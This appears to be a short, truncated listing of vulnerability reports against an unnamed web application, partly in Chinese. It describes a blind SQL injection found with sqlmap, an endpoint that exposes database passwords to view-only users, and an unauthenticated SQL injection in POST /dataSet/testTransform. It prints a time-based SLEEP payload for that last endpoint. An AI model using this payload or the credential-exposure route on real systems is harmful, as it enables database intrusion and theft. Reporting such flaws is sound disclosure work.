lcxing
lcxing
there is a blind sql injection in api /api/repo/pick. Use sqlmap can find it. sqlmap identified the following injection point(s) with a total of 21258 HTTP(s) requests: --- Parameter: JSON...
接口http://ip/dataSource/pageList存在权限问题,只有查看权限的可以获取数据库密码,从而直接登录数据库。  如果无法直接连接,则该用户可以调用POST /dataSet/testTransform进行SQL注入,该处也没有权限限制,payload如下: Parameter: JSON #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: {"sourceCode":"001","dynSentence":"(SELECT 6513 FROM (SELECT(SLEEP(5)))geRa)","dataSetParamDtoList":[],"dataSetTransformDtoList":[],"setType":"sql"} --- back-end DBMS:...